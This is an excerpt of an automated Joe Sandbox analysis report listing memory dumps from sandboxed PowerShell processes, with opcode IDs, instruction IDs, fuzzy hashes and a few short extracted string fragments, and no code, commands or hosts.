                                                                        • Instruction Fuzzy Hash: 75410331A0EBC94FE756AB3858915A83FE0EF16650F0900FBC488CB5D3DB19AC49C316
                                                                        Memory Dump Source
                                                                        • Source File: 00000004.00000002.2383024035.00007FF848B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848B40000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_4_2_7ff848b40000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: a0701e54cc00216033042e9493dc414822dc72e0609a670b8b96586f982c0c22
                                                                        • Instruction ID: 85320ba453b159df5b3642a8f589c0ff8e34b0e9b9216d79ada1020a62721d21
                                                                        • Opcode Fuzzy Hash: a0701e54cc00216033042e9493dc414822dc72e0609a670b8b96586f982c0c22
                                                                        • Instruction Fuzzy Hash: 5C31E622D1FE879FF699A62828121786BD0EF15BE0F5941BAD42DD35D3DF0C9C00435A
                                                                        Memory Dump Source
                                                                        • Source File: 00000004.00000002.2383024035.00007FF848B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848B40000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_4_2_7ff848b40000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 885362d6bfac381677a574b61c454bf0415ae875538c80f67ada40efc0432c42
                                                                        • Instruction ID: 37f83daa87e1cfcab20841743e3a382794e7601017744a6e3d1196d4e28a7c36
                                                                        • Opcode Fuzzy Hash: 885362d6bfac381677a574b61c454bf0415ae875538c80f67ada40efc0432c42
                                                                        • Instruction Fuzzy Hash: E7212622E1FA8A5FF399BA3C145217463D2EF81AA4F8801BAD01DC35D3EE1CEC11520A
                                                                        Memory Dump Source
                                                                        • Source File: 00000004.00000002.2382447871.00007FF848A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848A70000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_4_2_7ff848a70000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: ad327724b59b89c10fe6e8198c5c73b7f22e722d4169093af7414a1a842a16a7
                                                                        • Instruction ID: ec08cff0f97e7f3991ad9792492475bee9d38ac68f094ae246a6eaca14bb57ce
                                                                        • Opcode Fuzzy Hash: ad327724b59b89c10fe6e8198c5c73b7f22e722d4169093af7414a1a842a16a7
                                                                        • Instruction Fuzzy Hash: F5312B7091E64E8EFBB4EF15CC0ABF93294FF42355F400139D50D86092CB78A98ADB26
                                                                        Memory Dump Source
                                                                        • Source File: 00000004.00000002.2383024035.00007FF848B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848B40000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_4_2_7ff848b40000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 8ed955a7c9db00bd26e6a34c2c91923e51ba661735b07cc91006e0a8fcd90027
                                                                        • Instruction ID: f4fb101b039f07eec03a6a0ce45912f52fca9f1ea2fcc6d042466fcf9a9a0dc1
                                                                        • Opcode Fuzzy Hash: 8ed955a7c9db00bd26e6a34c2c91923e51ba661735b07cc91006e0a8fcd90027
                                                                        • Instruction Fuzzy Hash: 4C21F322E0EAD65FE359E63C28561756FE1EF5AE90F0805FED049CB2D7DE084C468326
                                                                        Memory Dump Source
                                                                        • Source File: 00000004.00000002.2383024035.00007FF848B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848B40000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_4_2_7ff848b40000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 992839f3ef97f0a2916221bd9070de383fcb660e959964097bb9f77eedcb2b5b
                                                                        • Instruction ID: d15350b0f735a91f27bf4ee0828479f6914f6ddfd2bc6fd0236158c5f6f9d252
                                                                        • Opcode Fuzzy Hash: 992839f3ef97f0a2916221bd9070de383fcb660e959964097bb9f77eedcb2b5b
                                                                        • Instruction Fuzzy Hash: 0C11A222E0EA855FE719EB2858562FCB7A1FF45760F1801BED08D871D3DF282C498745
                                                                        Memory Dump Source
                                                                        • Source File: 00000004.00000002.2383024035.00007FF848B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848B40000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_4_2_7ff848b40000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 84dafe67c6f7143c0eb52d83c97098ec92f884574f3eac1206d0698c2f61dc46
                                                                        • Instruction ID: f7f04142aa1cfb27635c88084136ace9ef1de3aa42bc1ab7e551b186dc5202af
                                                                        • Opcode Fuzzy Hash: 84dafe67c6f7143c0eb52d83c97098ec92f884574f3eac1206d0698c2f61dc46
                                                                        • Instruction Fuzzy Hash: AF113A21A0EAC51FD7A7EB385851465BFE0EF16760B1801FAC048CB1D3DA189C05C385
                                                                        Memory Dump Source
                                                                        • Source File: 00000004.00000002.2382447871.00007FF848A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848A70000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_4_2_7ff848a70000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 582908582f657131c1f04ed76f34d09c60f6b2c2f8b724a61ceffa3ac25bcdd6
                                                                        • Instruction ID: 3fff26735646f92442a3ec2b0c44caab59de539b4e447e85c8e34eaf18a3fd35
                                                                        • Opcode Fuzzy Hash: 582908582f657131c1f04ed76f34d09c60f6b2c2f8b724a61ceffa3ac25bcdd6
                                                                        • Instruction Fuzzy Hash: 4201843010CB084FDB44EF0CE051AA5B7E0FB85364F10052DE58AC3691D622E881CB46
                                                                        Memory Dump Source
                                                                        • Source File: 00000004.00000002.2383024035.00007FF848B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848B40000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_4_2_7ff848b40000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: bd8e429a855e0e9473a4e87919a79b37692e5c361217f40ca2418c1b9378cb66
                                                                        • Instruction ID: 6072ea34ce1d1a5ee7919302059ae3785c0cee6bf09905f75cfd8315726ea5f0
                                                                        • Opcode Fuzzy Hash: bd8e429a855e0e9473a4e87919a79b37692e5c361217f40ca2418c1b9378cb66
                                                                        • Instruction Fuzzy Hash: BDF0E533A0C90D5EE385E63C68061F973D2EFC9132F554277C55EC3242EE15980A4244
                                                                        Memory Dump Source
                                                                        • Source File: 00000004.00000002.2383024035.00007FF848B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848B40000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_4_2_7ff848b40000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: e4b499b58460e820a68912a112705c29745611bb00b7f7cbea5f0887e408425d
                                                                        • Instruction ID: 6c1b78fc423ed5ad839a1a4995bd83af79fd42027277bbea4b802668454e071c
                                                                        • Opcode Fuzzy Hash: e4b499b58460e820a68912a112705c29745611bb00b7f7cbea5f0887e408425d
                                                                        • Instruction Fuzzy Hash: 41E0DF32F1DB0A0EFB89A52C38130FDB3E1EF81560B64183FC20EC2443E92AA8124249
                                                                        Memory Dump Source
                                                                        • Source File: 00000006.00000002.2623857671.0000000004900000.00000040.00000800.00020000.00000000.sdmp, Offset: 04900000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_6_2_4900000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: cc584323dadcb1fa496305e870d3116b3da94d5e77324a9333de590fdb77ec2e
                                                                        • Instruction ID: d7a9447291af3434be6cec3d1caa3c8c51984f5441742a28d37f6bf0e67c1b06
                                                                        • Opcode Fuzzy Hash: cc584323dadcb1fa496305e870d3116b3da94d5e77324a9333de590fdb77ec2e
                                                                        • Instruction Fuzzy Hash: 99B13E70E00209DFDF20CFA9D98579EBBF6AF88314F14C539E415A7294EB74A946CB81
                                                                        Memory Dump Source
                                                                        • Source File: 00000006.00000002.2623857671.0000000004900000.00000040.00000800.00020000.00000000.sdmp, Offset: 04900000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_6_2_4900000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: dc3132591bcc61abcb3e6a5558d8f5e13b212589387e93c213e8eed69309522d
                                                                        • Instruction ID: d7c227faf7da1d073195627344b5f95f602719fdc885febc5116086d3cf10684
                                                                        • Opcode Fuzzy Hash: dc3132591bcc61abcb3e6a5558d8f5e13b212589387e93c213e8eed69309522d
                                                                        • Instruction Fuzzy Hash: 0FB16071E00209DFDB20CFA9D98179DBBF6AF88314F14C539D815E7298EBB4A945CB81
                                                                        Memory Dump Source
                                                                        • Source File: 00000006.00000002.2623857671.0000000004900000.00000040.00000800.00020000.00000000.sdmp, Offset: 04900000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_6_2_4900000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 7eb09feb0e8036bf8d1132a367dc5993dcf869fc7e82fcc324ecf1a04deda867
                                                                        • Instruction ID: 1b9a991d737ba0d34ad9ccc898c5001848f89a100606ef87dd3931e314f9cc82
                                                                        • Opcode Fuzzy Hash: 7eb09feb0e8036bf8d1132a367dc5993dcf869fc7e82fcc324ecf1a04deda867
                                                                        • Instruction Fuzzy Hash: 70418171A002008FDB18DF68C958AAD7BF6EF8A754F15846DE806EB7A1DB34AC45CB50
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000006.00000002.2660900942.00000000077F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077F0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_6_2_77f0000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: 4']q$4']q$4']q$4']q$4']q$4']q$$]q$$]q$$]q$$]q$$]q$$]q
                                                                        • API String ID: 0-78369665
                                                                        • Opcode ID: bff2b0610c7fe1fd6d80d906fa433e743ebdd4c189231e574de7ecd6d4f9ff6c
                                                                        • Instruction ID: 4dfabde702185280887b77312934e5f78db33de8a6dea17e52ca214b584ceea9
                                                                        • Opcode Fuzzy Hash: bff2b0610c7fe1fd6d80d906fa433e743ebdd4c189231e574de7ecd6d4f9ff6c
                                                                        • Instruction Fuzzy Hash: A9E149B1704206DFCB258F38CA5066ABBF2BF85250F2488ABDA55CB352DB35C845C762
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000006.00000002.2660900942.00000000077F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077F0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_6_2_77f0000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: 4']q$4']q$4']q$4']q$4']q$4']q
                                                                        • API String ID: 0-471056614
                                                                        • Opcode ID: fbb75935189d22ff72500a37ae90d161567a20bebfbe26a675751235a3ef3276
                                                                        • Instruction ID: 846eb89874f86ffbb3a78bb30877d7499c06220b212b9565c03e44dcf8326ba0
                                                                        • Opcode Fuzzy Hash: fbb75935189d22ff72500a37ae90d161567a20bebfbe26a675751235a3ef3276
                                                                        • Instruction Fuzzy Hash: 5DD1AEB0A102059FCB18CB68C651B9EBBB6EF85344F24C864EA116F395CB75EC46CBD1
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000006.00000002.2660900942.00000000077F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077F0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_6_2_77f0000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: 4']q$4']q$4']q$4']q$4']q$4']q
                                                                        • API String ID: 0-471056614
                                                                        • Opcode ID: 6f60f2340d4ff10ad8fef5bf4e4c36a62eb076d2f28af99ebfe9fabcfca2237e
                                                                        • Instruction ID: 811d964036c9e25349f6f07760bfe14744867a93d8603f5b774cc1e4302c2427
                                                                        • Opcode Fuzzy Hash: 6f60f2340d4ff10ad8fef5bf4e4c36a62eb076d2f28af99ebfe9fabcfca2237e
                                                                        • Instruction Fuzzy Hash: 8ED1B2B4A002159FDB28DF68CA51B9ABBB2EF84344F108495D5096F395CB35DD82CFA1
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000006.00000002.2660900942.00000000077F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077F0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_6_2_77f0000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: 4']q$4']q$4']q$4']q
                                                                        • API String ID: 0-1785108022
                                                                        • Opcode ID: fc0adffeb50ff174cbd2565d44b46d804b67deaf8372dbaa3368c4235adf7714
                                                                        • Instruction ID: 183d3fd642434423f50b5d2f3b3a780eaa6cc7fdc3e827e5ed8038b5b4cfe775
                                                                        • Opcode Fuzzy Hash: fc0adffeb50ff174cbd2565d44b46d804b67deaf8372dbaa3368c4235adf7714
                                                                        • Instruction Fuzzy Hash: 9D1259B1B04306CFCB258B788A5176A7BB29FC3350F15C8BAD649CB351DA35D846C7A2
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000006.00000002.2623857671.0000000004900000.00000040.00000800.00020000.00000000.sdmp, Offset: 04900000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_6_2_4900000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: Haq$$]q$$]q
                                                                        • API String ID: 0-1533201563
                                                                        • Opcode ID: 113262eba0a5160c0f8087de31379add95f558eccb167873832b9b07cc68489c
                                                                        • Instruction ID: 348a6c5692322ac6e2d9242e0140a32614a83aebc34c67299804181ac79499ed
                                                                        • Opcode Fuzzy Hash: 113262eba0a5160c0f8087de31379add95f558eccb167873832b9b07cc68489c
                                                                        • Instruction Fuzzy Hash: CE125234B002188FCB19DF64C8546AEB7B6BF89305F1485E9D509AB3A1DF35AD85CF81
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000006.00000002.2660900942.00000000077F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077F0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_6_2_77f0000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: 4']q$4']q$$]q
                                                                        • API String ID: 0-1444653880
                                                                        • Opcode ID: 949652fccd7356a7ec645aeeac0564dc6e38efa8eda9873444449eb57e8c62cb
                                                                        • Instruction ID: a20659e121880983b087245c75458a8abece4ebafb80b73df86b129ba01d1fd2
                                                                        • Opcode Fuzzy Hash: 949652fccd7356a7ec645aeeac0564dc6e38efa8eda9873444449eb57e8c62cb
                                                                        • Instruction Fuzzy Hash: 6FA17EB0708346DFCB159B38CA5076A7FE69F82240F1488AAD745CF392DB36D945C7A2
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000006.00000002.2660900942.00000000077F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077F0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_6_2_77f0000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: 4']q$4']q$4']q
                                                                        • API String ID: 0-705557208
                                                                        • Opcode ID: e67e19405b89535c329e8368b82ffa334d6ddedfd5d1aab359fd167064cc8802
                                                                        • Instruction ID: cf8de6da200f413badf1843fe1d63db9b9356892d5582a29c6a9456a38babd81
                                                                        • Opcode Fuzzy Hash: e67e19405b89535c329e8368b82ffa334d6ddedfd5d1aab359fd167064cc8802
                                                                        • Instruction Fuzzy Hash: 30A18BB4A102059FCB18CF58C640B9EBBB6EF89344F14C869EA116F355CB75EC86CB91
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000006.00000002.2660900942.00000000077F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077F0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_6_2_77f0000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: 4']q$4']q
                                                                        • API String ID: 0-3120983240
                                                                        • Opcode ID: a62369d34d9e8ff0a569e5a4253a6f6654aa978a45e60d1e620c8a88355b3569
                                                                        • Instruction ID: 3736933f84265b8fb2ddbd849da21521217cd33db65eaa29025bee0f7eb13470
                                                                        • Opcode Fuzzy Hash: a62369d34d9e8ff0a569e5a4253a6f6654aa978a45e60d1e620c8a88355b3569
                                                                        • Instruction Fuzzy Hash: 1C926CB4B00215DFD724CB18CA54BA9BBB2BF85304F14C4A9D909AB355DB72DD82CF91
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000006.00000002.2660900942.00000000077F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077F0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_6_2_77f0000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: 4']q$4']q
                                                                        • API String ID: 0-3120983240
                                                                        • Opcode ID: ae740d353c54f98c7f0c997e0fb8dc43e784edc52cdd70ae82ca2fdea8d7f91f
                                                                        • Instruction ID: 65ad900672df48f7884ae7dbe3619adee7e5da092eeb24a2cf3e4c02547a2cc6
                                                                        • Opcode Fuzzy Hash: ae740d353c54f98c7f0c997e0fb8dc43e784edc52cdd70ae82ca2fdea8d7f91f
                                                                        • Instruction Fuzzy Hash: 84F1E4B0B002159FDB24DF68CA50BAEBBB6EF84340F108495D9096F395DB75DD82CB91
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000006.00000002.2660900942.00000000077F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077F0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_6_2_77f0000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: 4']q$4']q
                                                                        • API String ID: 0-3120983240
                                                                        • Opcode ID: 3d1f88a651d3f25652d874fa01a4fac3541f9dc295a6e87dc43fecb094f9b772
                                                                        • Instruction ID: 2407f22c98986af5dc15050b056ca31b1b6fa0a38744154ba570abf2cff6ef3b
                                                                        • Opcode Fuzzy Hash: 3d1f88a651d3f25652d874fa01a4fac3541f9dc295a6e87dc43fecb094f9b772
                                                                        • Instruction Fuzzy Hash: 6C5168F17142068FCB249B78875466B7BE6AF82384B1488B5D6518F366DA35C842C7A3
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000006.00000002.2660900942.00000000077F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077F0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_6_2_77f0000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: 4']q
                                                                        • API String ID: 0-1259897404
                                                                        • Opcode ID: aa1d9dfd551525369b872ec5274d23ef20d5d7c467619468ec0b3a42258412da
                                                                        • Instruction ID: fc52ab2a38f151910b9e84f49f7614286840a0715d5c183e6fe2b0d8b1bc7c3d
                                                                        • Opcode Fuzzy Hash: aa1d9dfd551525369b872ec5274d23ef20d5d7c467619468ec0b3a42258412da
                                                                        • Instruction Fuzzy Hash: 24726CB4A00215DFD724CB18C980FA9BBB2BF85714F14C599DA09AB352DB72DD82CF91
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000006.00000002.2623857671.0000000004900000.00000040.00000800.00020000.00000000.sdmp, Offset: 04900000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_6_2_4900000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: W
                                                                        • API String ID: 0-655174618
                                                                        • Opcode ID: 2e141a074d0cbac2c508cb9f7f3c34ace8ce8877987048648332a04e1d41833d
                                                                        • Instruction ID: dc9cda6441bfc85397b6401103c82e3292b175ebb0891d9d9e0bb866e39de479
                                                                        • Opcode Fuzzy Hash: 2e141a074d0cbac2c508cb9f7f3c34ace8ce8877987048648332a04e1d41833d
                                                                        • Instruction Fuzzy Hash: 3D224C74A012099FCB15CF98C594AAEFBB2FF89310F25C569E815AB3A5C731ED41CB90
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000006.00000002.2660900942.00000000077F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077F0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_6_2_77f0000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: 4']q
                                                                        • API String ID: 0-1259897404
                                                                        • Opcode ID: 92f79cca98353c85cc2c038b2d49f21c72b20c44b41b9666347409a1cf193638
                                                                        • Instruction ID: 37c60a981af50eb524bdb0d202f362094f8fcd37170984e6188271ab2be777a6
                                                                        • Opcode Fuzzy Hash: 92f79cca98353c85cc2c038b2d49f21c72b20c44b41b9666347409a1cf193638
                                                                        • Instruction Fuzzy Hash: E8225BB4A00215DFDB24CB18CA81FA9BBB2FB85714F14C495DA09AB352DB72DD81CF91
                                                                        • Source File: 00000006.00000002.2623857671.0000000004900000.00000040.00000800.00020000.00000000.sdmp, Offset: 04900000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_6_2_4900000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: feb5c07984fdebb95cdd5795ed344010b3811414353d20e4a121f495f347ac73
                                                                        • Instruction ID: 2271c9bea15f127ae29d2ccb1b471d38375bb493ef36d24d54202082f4ac3a9c
                                                                        • Opcode Fuzzy Hash: feb5c07984fdebb95cdd5795ed344010b3811414353d20e4a121f495f347ac73
                                                                        • Instruction Fuzzy Hash: FD11A430D04148DFEF74DA94E998BECB775AB8531DF14943AC001B61D4EBB46ACACB16
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000006.00000002.2660900942.00000000077F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077F0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_6_2_77f0000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: 4']q$4']q$tP]q$tP]q$$]q$$]q$$]q$$]q$$]q$$]q$$]q$$]q$$]q$$]q
                                                                        • API String ID: 0-344283158
                                                                        • Opcode ID: 286cda9c90a619f08855ad16e6887266a51ee7b87a2fda058bdb93c8bb23bcf7
                                                                        • Instruction ID: c70d793b537b558029ffa0cc58f5fa95f7bd55df30b919891000a5c0f0c75d55
                                                                        • Opcode Fuzzy Hash: 286cda9c90a619f08855ad16e6887266a51ee7b87a2fda058bdb93c8bb23bcf7
                                                                        • Instruction Fuzzy Hash: E0D169B17043069FCB248F69CA5067ABBE6EFC6390F14886BDA558B351CB35D841C7A3
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000006.00000002.2660900942.00000000077F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077F0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_6_2_77f0000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: 4']q$4']q$tP]q$tP]q$tP]q$tP]q$$]q$(cq$(cq$(cq$(cq
                                                                        • API String ID: 0-3029092631
                                                                        • Opcode ID: dc0d0ed3a62a0495b8e42b64d244e2d89e8f74d5e5ad4552f422a03cd393b882
                                                                        • Instruction ID: 83856289e741a1804008bef05778e10d0c8b7d18fd24765002f883eeb206efb9
                                                                        • Opcode Fuzzy Hash: dc0d0ed3a62a0495b8e42b64d244e2d89e8f74d5e5ad4552f422a03cd393b882
                                                                        • Instruction Fuzzy Hash: 7CA1F9B1700206DFCB34DF68C660AAABBE6EF89350F148869DA455F395CB35DC41C7A1
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000006.00000002.2660900942.00000000077F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077F0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_6_2_77f0000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: 4']q$4']q$4']q$4']q$$]q$$]q$$]q$$]q$$]q$$]q
                                                                        • API String ID: 0-267665775
                                                                        • Opcode ID: 911b2454e45effd691bb831b54e1d8edc426dc0ca19c31ae6d3a35106143e7f5
                                                                        • Instruction ID: 4b76463052fca42a57856d26087f979f256f4d9ff9a59474221d556518b1cb22
                                                                        • Opcode Fuzzy Hash: 911b2454e45effd691bb831b54e1d8edc426dc0ca19c31ae6d3a35106143e7f5
                                                                        • Instruction Fuzzy Hash: 77A146B1704306CFCB258A388A5066E7BE5FF82690F1488BADA45CB353DB35CC45C7A2
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000006.00000002.2660900942.00000000077F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077F0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_6_2_77f0000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: 4']q$4']q$d%cq$d%cq$d%cq$d%cq$tP]q$tP]q$$]q
                                                                        • API String ID: 0-3118609902
                                                                        • Opcode ID: 4a19fc87bcf996d60f0debf745b36522b6b9e27bb28b92b6818130551ccc5c52
                                                                        • Instruction ID: da16dc388d3179864b1e206953b5b580c5642cc0850b2e7f79806947996ab427
                                                                        • Opcode Fuzzy Hash: 4a19fc87bcf996d60f0debf745b36522b6b9e27bb28b92b6818130551ccc5c52
                                                                        • Instruction Fuzzy Hash: 69712DB1710205DFCB359F78CA6066ABBE2EF85750F154C55DA018B350DB31DC46C761
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000006.00000002.2660900942.00000000077F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077F0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_6_2_77f0000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: 4']q$4']q$$]q$$]q$$]q$$]q$$]q$$]q
                                                                        • API String ID: 0-3118171705
                                                                        • Opcode ID: 55a85b7d3bcc9d71794d159a656a226045fdc31dd5160b8ba1ff73e3e8115384
                                                                        • Instruction ID: 9017a0d85ce35f0c3b32c8ee0311b8e54d6107c0bd0f88297bf81af193f5b6b0
                                                                        • Opcode Fuzzy Hash: 55a85b7d3bcc9d71794d159a656a226045fdc31dd5160b8ba1ff73e3e8115384
                                                                        • Instruction Fuzzy Hash: D4F149B17043869FCB259F7D8A9067BBBE5EFC2290F1488BADA45CB351DA31C841C761
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000006.00000002.2660900942.00000000077F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077F0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_6_2_77f0000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: 4']q$4']q$4']q$4']q$t~pq$$]q$$]q$$]q
                                                                        • API String ID: 0-462330472
                                                                        • Opcode ID: d0b46ee2ecf7c464a07fab6037946117215f29b221710b411b1011f6a31543ab
                                                                        • Instruction ID: 3055dba0a3206c9b4099d1193e342416828129f472f86c7e53d4c3a41fbac010
                                                                        • Opcode Fuzzy Hash: d0b46ee2ecf7c464a07fab6037946117215f29b221710b411b1011f6a31543ab
                                                                        • Instruction Fuzzy Hash: 23D149B1B002069FCB249F788A5066EBBE6FFC5350F14886AD655CB352DF31C946C7A2
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000006.00000002.2660900942.00000000077F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077F0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_6_2_77f0000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: 4']q$4']q$tP]q$tP]q$$]q$$]q$$]q
                                                                        • API String ID: 0-108373575
                                                                        • Opcode ID: 685cd932a6d4fbecf40549433274e396d31ac7d51637b302cfcdbc99b7617881
                                                                        • Instruction ID: 279b75593a939a712f681e9812be6a8ba835be3b02f3567311b22900859aa552
                                                                        • Opcode Fuzzy Hash: 685cd932a6d4fbecf40549433274e396d31ac7d51637b302cfcdbc99b7617881
